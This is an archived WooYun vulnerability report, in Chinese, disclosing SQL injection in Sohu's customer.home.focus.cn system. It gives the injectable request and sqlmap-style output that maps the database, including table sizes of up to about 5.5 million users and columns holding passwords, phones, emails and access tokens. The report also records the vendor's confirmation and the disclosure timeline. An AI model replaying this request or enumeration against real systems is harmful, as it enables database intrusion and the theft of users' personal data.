乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-20: 细节已通知厂商并且等待厂商处理中 2015-12-21: 厂商已经确认,细节仅向厂商公开 2015-12-31: 细节向核心白帽子及相关领域专家公开 2016-01-10: 细节向普通白帽子公开 2016-01-20: 细节向实习白帽子公开 2016-02-01: 细节向公众公开
rt
客户管理系统 customer.home.focus.cn uac表560W用户
GET /proauth/tidiy/20150331/list.php?page=1&type=all&pagesize=8&team=1&ordertype=1&_=1450523184981 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5Accept: */*Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5Referer: http://home.focus.cn/zhuanti15/tidiymatch/Cache-Control: no-cacheX-Forwarded-For: 127.0.0.1Host: customer.home.focus.cnCookie: IPLOC=CN88; SUV=1512191837214706; homeforumsaw=607%2C1300; PHPSESSID=n9kkss0gec0vleplh7mnripuk5; _f_bbs_e=0Accept-Encoding: gzip, deflateavailable databases [3]:[*] home_wd[*] information_schema[*] test[00:29:18] [INFO] fetched data logged to text files under './output/customer.home.focus.cn'[*] shutting down at 00:29:18Database: home_wd[15 tables]+--------------+| authtable || authtorole || gzt || gzt_news || member || member2 || menutable || project || projectfield || raffle || roletable || shake || uac || uac2 || userinfo |[00:35:17] [DEBUG] performed 11 queries in 0.80 secondsDatabase: home_wd+--------------+---------+| Table | Entries |+--------------+---------+| uac | 5522287 || uac2 | 466483 || raffle | 307568 || member2 | 266379 || member | 139418 || projectfield | 2051 || project | 270 || authtorole | 142 || authtable | 99 || menutable | 56 || userinfo | 31 || shake | 12 || roletable | 6 || gzt | 5 || gzt_news | 3 |+--------------+---------++++++++++++++++++++++++++++++++++Database: home_wdTable: uac[17 columns]+----------+--------------+| Column | Type |+----------+--------------+| actype | int(4) || address | varchar(500) || city | varchar(50) || email | varchar(200) || id | int(4) || ip | varchar(40) || nickname | varchar(20) || partnum | int(4) || phone | varchar(12) || platform | varchar(20) || province | varchar(20) || pwd | varchar(30) || reward | int(4) || rtime | datetime || sex | char(1) || uname | varchar(20) || votenum | int(4) |+----------+--------------+Database: home_wdTable: raffle[17 columns]+----------+--------------+| Column | Type |+----------+--------------+| actype | int(4) || address | varchar(200) || city | char(50) || email | char(28) || id | int(4) || ip | char(50) || nickname | char(20) || partnum | int(4) || phone | char(12) || platform | char(20) || province | char(20) || pwd | char(30) || reward | int(4) || rtime | datetime || sex | char(1) || uname | char(20) || votenum | int(4) |+----------+--------------+Database: home_wdTable: projectfield[10 columns]+-----------+--------------+| Column | Type |+-----------+--------------+| excelw | int(4) || field | varchar(20) || fieldname | varchar(40) || ID | int(4) || isshow | smallint(4) || json | varchar(200) || piccatlog | varchar(50) || projectid | int(4) || sortno | int(4) || width | int(4) |+-----------+--------------+Database: home_wdTable: roletable[2 columns]+----------+-------------+| Column | Type |+----------+-------------+| ID | int(4) || RoleName | varchar(30) |+----------+-------------+Database: home_wdTable: member2[17 columns]+----------+-----------+| Column | Type |+----------+-----------+| actype | int(4) || address | char(140) || city | char(50) || email | char(28) || id | int(4) || ip | char(50) || nickname | char(20) || partnum | int(4) || phone | char(12) || platform | char(20) || province | char(20) || pwd | char(30) || reward | int(4) || rtime | datetime || sex | char(1) || uname | char(20) || votenum | int(4) |+----------+-----------+Database: home_wdTable: menutable[6 columns]+----------+-------------+| Column | Type |+----------+-------------+| level | int(4) || ID | int(4) || menuName | varchar(30) || menutype | varchar(10) || parent | int(4) || URL | varchar(60) |+----------+-------------+Database: home_wdTable: project[6 columns]+-----------+-------------+| Column | Type |+-----------+-------------+| ID | int(4) || kehuid | int(4) || proindex | int(4) || proname | varchar(40) || ptype | smallint(4) || tablename | varchar(10) |+-----------+-------------+Database: home_wdTable: gzt_news[17 columns]+----------+----------+| Column | Type |+----------+----------+| actype | int(4) || address | text || city | char(50) || email | char(28) || id | int(4) || ip | char(50) || nickname | char(20) || partnum | int(4) || phone | char(12) || platform | char(20) || province | char(20) || pwd | char(30) || reward | int(4) || rtime | datetime || sex | char(1) || uname | char(30) || votenum | int(4) |+----------+----------+Database: home_wdTable: authtorole[2 columns]+--------+--------+| Column | Type |+--------+--------+| AuthID | int(4) || RoleID | int(4) |+--------+--------+Database: home_wdTable: member[15 columns]+-------------+--------------+| Column | Type |+-------------+--------------+| accesstoken | varchar(128) || address | varchar(100) || city | varchar(30) || email | varchar(30) || headerimg | varchar(200) || ID | int(4) || loginnum | int(4) || name | varchar(30) || nickname | varchar(30) || phone | varchar(12) || province | varchar(30) || pwd | varchar(30) || rtime | datetime || sex | char(1) || uacid | varchar(40) |+-------------+--------------+Database: home_wdTable: userinfo[5 columns]+----------------+-------------+| Column | Type |+----------------+-------------+| AccountEndTime | date || ID | int(11) || Password | varchar(20) || UserName | varchar(30) || UserRole | int(4) |+----------------+-------------+Database: home_wdTable: shake[4 columns]+---------+-------------+| Column | Type |+---------+-------------+| gmstatu | int(4) || partnum | int(4) || partyid | varchar(20) || rtime | datetime |+---------+-------------+Database: home_wdTable: gzt[17 columns]+----------+--------------+| Column | Type |+----------+--------------+| actype | int(4) || address | varchar(500) || city | char(50) || email | char(28) || id | int(4) || ip | char(50) || nickname | char(20) || partnum | int(4) || phone | char(12) || platform | char(20) || province | char(20) || pwd | char(30) || reward | int(4) || rtime | datetime || sex | char(1) || uname | char(20) || votenum | int(4) |+----------+--------------+Database: home_wdTable: uac2[17 columns]+----------+--------------+| Column | Type |+----------+--------------+| actype | int(4) || address | varchar(500) || city | char(50) || email | char(28) || id | int(4) || ip | char(50) || nickname | char(20) || partnum | int(4) || phone | char(12) || platform | char(20) || province | char(20) || pwd | char(30) || reward | int(4) || rtime | datetime || sex | char(1) || uname | char(20) || votenum | int(4) |+----------+--------------+Database: home_wdTable: uac[17 columns]+----------+--------------+| Column | Type |+----------+--------------+| actype | int(4) || address | varchar(500) || city | varchar(50) || email | varchar(200) || id | int(4) || ip | varchar(40) || nickname | varchar(20) || partnum | int(4) || phone | varchar(12) || platform | varchar(20) || province | varchar(20) || pwd | varchar(30) || reward | int(4) || rtime | datetime || sex | char(1) || uname | varchar(20) || votenum | int(4) |+----------+--------------+Database: home_wdTable: authtable[3 columns]+-----------+-------------+| Column | Type |+-----------+-------------+| Authority | varchar(30) || ID | int(4) || menuID | int(4) |+-----------+-------------+
危害等级:高
漏洞Rank:15
确认时间:2015-12-21 09:56
感谢你对搜狐安全的支持!
暂无